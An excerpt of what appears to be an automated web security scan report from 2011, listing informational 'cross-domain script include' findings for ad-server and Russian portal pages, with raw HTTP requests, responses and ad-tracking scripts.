<li><a href="http://www.anapa.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.angarsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.arzamas.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.arhangel-sk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.astrahan.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.astrahan.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.barnaul.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.belgorod.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.biysk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.blagoveshchensk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........................</a>
...[SNIP]...
<li><a href="http://www.bryansk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.velnovgorod.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">.............. ................</a>
...[SNIP]...
<li><a href="http://www.vladivostok.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.vladikavkaz.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.vladimir.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.volgograd.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.voljskiy.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.vologda.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.voronezh.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.gelendzhik.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.groznyiy.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.ekaterinburg.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........................</a>
...[SNIP]...
<li><a href="http://www.ivanovo.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.izhevsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.irkutsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.yoshkarola.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............-......</a>
...[SNIP]...
<li><a href="http://www.kavminvody.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.kazan.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.kaliningrad.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.kaluga.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.kemerovo.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.kirov.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.kolomna.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.komsomolsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................-....-..........</a>
...[SNIP]...
<li><a href="http://www.kostroma.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.krasnodar.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.krasnoyarsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">....................</a>
...[SNIP]...
<li><a href="http://www.kurgan.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.kursk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.lipetsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.magadan.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.magnitogorsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........................</a>
...[SNIP]...
<li><a href="http://www.mahachkala.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.murmansk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.nabchelny.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">.................... ..........</a>
...[SNIP]...
<li><a href="http://www.nal-chik.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.nahodka.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.nizhnekamsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">....................</a>
...[SNIP]...
<li><a href="http://www.nizhniynovgorod.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............ ................</a>
...[SNIP]...
<li><a href="http://www.nijniy-tagil.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............ ..........</a>
...[SNIP]...
<li><a href="http://www.novokuznetsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.novorossiysk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........................</a>
...[SNIP]...
<li><a href="http://www.novosibirsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.noril-sk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.noyabr-sk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.omsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........</a>
...[SNIP]...
<li><a href="http://www.orel.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........</a>
...[SNIP]...
<li><a href="http://www.orenburg.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.penza.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.perm.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.petrozavodsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........................</a>
...[SNIP]...
<li><a href="http://www.petropavlovsk-kamchatskiy.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........................-....................</a>
...[SNIP]...
<li><a href="http://www.pskov.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.rostovnadonu.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............-....-........</a>
...[SNIP]...
<li><a href="http://www.ryazan.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.samara.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.saint-petersburg.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........-..................</a>
...[SNIP]...
<li><a href="http://www.saransk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.saratov.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.smolensk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.sochi.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........</a>
...[SNIP]...
<li><a href="http://www.stavropol.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">....................</a>
...[SNIP]...
<li><a href="http://www.sterlitamak.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.syz.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.syiktyivkar.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.tambov.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.tver.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.tolyatti.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.tomsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.tula.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........</a>
...[SNIP]...
<li><a href="http://www.tyumen.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.ulanude.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........-......</a>
...[SNIP]...
<li><a href="http://www.ulyanovsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.ussuriysk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.ufa.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......</a>
...[SNIP]...
<li><a href="http://www.khabarovsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.cheboksary.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.chelyabinsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.cherepovets.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.yujno-sahalinsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........-..................</a>
...[SNIP]...
<li><a href="http://www.yakutsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.yaroslavl.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.countries.trucklist.ru/" onclick="set_current_region(this, 'country'); return false;">...... ............</a>
...[SNIP]...
<li><a href="http://www.belarus.trucklist.ru/" onclick="set_current_region(this, 'country'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.germany.trucklist.ru/" onclick="set_current_region(this, 'country'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.korea.trucklist.ru/" onclick="set_current_region(this, 'country'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.latvia.trucklist.ru/" onclick="set_current_region(this, 'country'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.Poland.trucklist.ru/" onclick="set_current_region(this, 'country'); return false;">............</a>
...[SNIP]...
<a href="http://www.liveinternet.ru/click;trucklist"
target="_blank" rel="nofollow"><img src="http://counter.yadro.ru/logo;trucklist?44.1"
title="LiveInternet"
alt="" border="0" width="31" height="31"/></a>
...[SNIP]...
<noscript><a
                       rel="nofollow"

                       target="_top" href="http://top.mail.ru/jump?from=1446197"><img

                       src="http://d1.c1.b6.a1.top.list.ru/counter?js=na;id=1446197;t=69"

                       border="0" height="31" width="38"

                       alt="..............@Mail.ru"/></a>
...[SNIP]...
<!-- begin of Top100 code -->

                       <a rel="nofollow" href="http://top100.rambler.ru/top100/"><img src="http://counter.rambler.ru/top100.cnt?1433420" alt="" width="1" height="1" border="0" /></a>
...[SNIP]...
<!-- begin of Top100 logo -->

                       <a rel="nofollow" href="http://top100.rambler.ru/top100/"><img src="http://top100-images.rambler.ru/top100/banner-88x31-rambler-gray2.gif" alt="Rambler's Top100" width="88" height="31" border="0" /></a>
...[SNIP]...
24. Cross-domain script include  previous  next
There are 109 instances of this issue:

24.1. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=97383008780889220&clkurl=http://ib.adnxs.com/click/AAAAAAAAFEAAAAAAAAAUQAAAAMDMzABA4XoUrkfhFEDhehSuR-EUQICU8FEmC1Z8SsYda6b2ziU-g7VNAAAAAIAeAQC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gA3CRQE4ggBAgUCAAMAAAAAkxzWVwAAAAA./cnd=!wA_Htwjc8wIQx8kKGAAg0ccBKJQIMQAAALxH4RRAQgoIABAAGAAgASgBQgsIn0YQABgAIAMoAUILCJ9GEAAYACACKAFIAVAAWLcSYABolgU./referrer=http%3A%2F%2Fwww.livejournal.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBJSjBPoO1TZvTCJDvlQfqvNzyB9fq-NMBl6GU7BiXn6ezIQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00NDU2MTgyMTM1OTU2OTc0oAHD8v3sA7IBE3d3dy5saXZlam91cm5hbC5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUDl0S8xnL7FEJVbNsodwmXFAeDNADA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo34vh0s_LrmO7JhTOOWS3K7jlIvwuoZTzm9CCE451wYOqFwb0J3fge50gbmzQ8L9Nk59EnbauPS1n9y5CZe.9pMzanHKnRBejFPu2IJHOOWOfhXEKTdjATtuOdtWnHLTH3rilutYiVvOVBen3LSbijjlKst8geHOiFu.Wwgoz.C7ZWcDAwcwIe1kZGRkYAi8xcgMpBgMmBiEQXwFM7Dw0gKwMEsmIxtQkCWEiY2RHciQ38XEwA1SBk2DIAMZADWIkL4-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUxOdW3WQldyr.xNlqt1dY_m2yKF0DA3gBY2BgEGFg6lzCwJLdysDI.4OB4YYrAwMDJwMDo34vxzZvqFwLUO4nUM4NIefSj0uuIzvmFE65JLfrOOUivK7hlPObEIJTzrWBAyrXBnTnd6A7XWDu7JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiIwbBlxyld2CwHlGXy37Gxg4AAmpJ2MjIwMDIG3GJmBFIMBE4MIiK9gBhZeWgAWZslkZAMKsoQwsTGyAxnyu5gYuEHKwGnQB2QeAwMAUdqQwA--; Domain=.amgdgt.com; Expires=Wed, 25-May-2011 14:20:49 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3919
Date: Mon, 25 Apr 2011 14:20:48 GMT

_289669_amg_acamp_id=166308;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732017/direct/01/rnd=1043494379?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlNedbcTg0PaihQfN8uf83YXzbLhnZW8sdXNhLHQsMTMwMzc0MTI0OTEwMCxjLDI4OTY2OSxwYyw2OTExMixhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY1LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBRkVBQUFBQUFBQUFVUUFBQUFNRE16QUJBNFhvVXJrZmhGRURoZWhTdVItRVVRSUNVOEZFbUMxWjhTc1lkYTZiMnppVS1nN1ZOQUFBQUFJQWVBUUMxQUFBQWxnSUFBQUlBQUFESHBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFDd0ItZ0EzQ1JRRTRnZ0JBZ1VDQUFNQUFBQUFreHpXVndBQUFBQS4vY25kPSF3QV9IdHdqYzh3SVF4OGtLR0FBZzBjY0JLSlFJTVFBQUFMeEg0UlJBUWdvSUFCQUFHQUFnQVNnQlFnc0luMFlRQUJnQUlBTW9BVUlMQ0o5R0VBQVlBQ0FDS0FGSUFWQUFXTGNTWUFCb2xnVS4vcmVmZXJyZXI9aHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vL2NsaWNrZW5jPWh0dHA6Ly9hZGNsaWNrLmcuZG91YmxlY2xpY2submV0L2FjbGs_c2E9bCZhaT1CSlNqQlBvTzFUWnZUQ0pEdmxRZnF2Tnp5QjlmcS1OTUJsNkdVN0JpWG42ZXpJUUFRQVJnQklBQTRBVkNBeC1IRUJHREo3b09JOEtQc0VvSUJGMk5oTFhCMVlpMDBORFUyTVRneU1UTTFPVFUyT1RjMG9BSEQ4djNzQTdJQkUzZDNkeTVzYVhabGFtOTFjbTVoYkM1amIyMjZBUW96TURCNE1qVXdYMkZ6eUFFSjJnRWJhSFIwY0RvdkwzZDNkeTVzYVhabGFtOTFjbTVoYkM1amIyMHZtQUtJSjhBQ0JNZ0NoZExQQ3VBQ0FPb0NHalUyTlRVdmJHb3VhRzl0WlhCaFoyVXZiRzluWjJWa2IzVjBxQU1CNkFQNEFfVURDQUNBaE9BRUFZQUc2Y1NGOU1XUTFva3kmbnVtPTEmc2lnPUFHaVdxdHhtcThuVzNDR2ZKOFJRbmVtOVZlLUduNlBzX2cmY2xpZW50PWNhLXB1Yi00NDU2MTgyMTM1OTU2OTc0JmFkdXJsPQo-/clkurl=">\n'+
'</script>
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69112&c5=166308&c6=&cv=1.3&cj=1&rn=156936241" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...
24.2. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=71518370253033940&clkurl=http://ib.adnxs.com/click/H4XrUbgeA0AfhetRuB4DQAAAAMDMzAhAzczMzMzMCEDNzMzMzMwIQOtg8QHzcr0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAAfyWMQQAAAAA./cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU./referrer=http%3A%2F%2Fgames.webalta.ru%2F/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0xMTM0ODIyNjgyNTEwODc5oAHD8v3sA7IBEGdhbWVzLndlYmFsdGEucnW6AQoxNjB4NjAwX2FzyAEJ2gEYaHR0cDovL2dhbWVzLndlYmFsdGEucnUvmALWEsACBMgChdLPCqgDAegDaegD1AfoA8EC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyp--SO2lIMceltajJwn2qFCTNn3A%26client%3Dca-pub-1134822682510879%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUhvvA3uMYtZiectC07uf2QDyvEasDA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo35HdswpnHJJbtdxykV4XcMp5zchBKecawMHVK4N6JbvQLe4wN0i4X4bpz4JO21c.tpP7tyES1_7yRm1OOVOCC_GKXdswSOccke_CuKUm7GAHbecbStOuekPPXHLdazELWeqi1Nu2k1FnHKVZb4MTJNDGVgdnjAw6uQxMHwU.g8EoDSRH8BYDYwTRtx6u4WA8gy.mzMYGDiACWknI1AxQ.AtRiYgxWDAyCDMwKBgBhZcWgAWZMlkZAXKsYQwsTKyARnyuxgZeODpD2QYAwCGTZPB

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUlAz8J7YZQuuVKsw_ef0aAc0zrdADA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo34v16vZuOQ6smNO4ZRLcruOUy7C6xpOOb8JITjlXBs4oHJtQHd.B7rTBebODgn32zj1Sdhp49LXfnLnJlz62k_OqMUpd0J4MU65Ywse4ZQ7.lUQp9yMBey45WxbccpNf.iJW65jJW45U12cctNuKuKUqyzzBYY7I275biGgPIPvlp0NDBzAhLSTkZGRgSHwFiMzkGIwYGIQBvEVzMDCSwvAwiyZjGxAQZYQJjZGdiBDfhcTAzdIGTQNggxkAAAFopIm; Domain=.amgdgt.com; Expires=Wed, 25-May-2011 14:23:13 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3734
Date: Mon, 25 Apr 2011 14:23:13 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=499353087?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUiPbw6T2uHVm68iJ.eWaH0XWjcghnZW8sdXNhLHQsMTMwMzc0MTM5MzU2NCxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0g0WHJVYmdlQTBBZmhldFJ1QjREUUFBQUFNRE16QWhBemN6TXpNek1DRUROek16TXpNd0lRT3RnOFFIemNyMGJTc1lkYTZiMnppVWhnN1ZOQUFBQUFDOGhBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUpfQ2s4QWh3UUJBZ1VDQUFRQUFBQUFmeVdNUVFBQUFBQS4vY25kPSEweFZtWVFqMjVRSVF4c2tLR0FBZzBjY0JLRTh4QUFBQXdNek1DRUJDRXdnQUVBQVlBQ0FCS1A3X19fX19fX19fX3dGSUFGQUFXUDhVWUFCb2xnVS4vcmVmZXJyZXI9aHR0cDovL2dhbWVzLndlYmFsdGEucnUvL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUIyRGJySUlPMVRlQ3RJY2ZNc1FldnI2M2tEZGZxLU5NQm42Q1U3QmpieE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkweE1UTTBPREl5TmpneU5URXdPRGM1b0FIRDh2M3NBN0lCRUdkaGJXVnpMbmRsWW1Gc2RHRXVjblc2QVFveE5qQjROakF3WDJGenlBRUoyZ0VZYUhSMGNEb3ZMMmRoYldWekxuZGxZbUZzZEdFdWNuVXZtQUxXRXNBQ0JNZ0NoZExQQ3FnREFlZ0RhZWdEMUFmb0E4RUM5UU1BQUFERWdBYm90ODZxd1k2eWh0RUImbnVtPTEmc2lnPUFHaVdxdHlwLS1TTzJsSU1jZWx0YWpKd24ycUZDVE5uM0EmY2xpZW50PWNhLXB1Yi0xMTM0ODIyNjgyNTEwODc5JmFkdXJsPQo-/clkurl=">\n'+
'</script>
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=1508694624" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...
24.3. http://auto.webalta.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://auto.webalta.ru
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: auto.webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31473

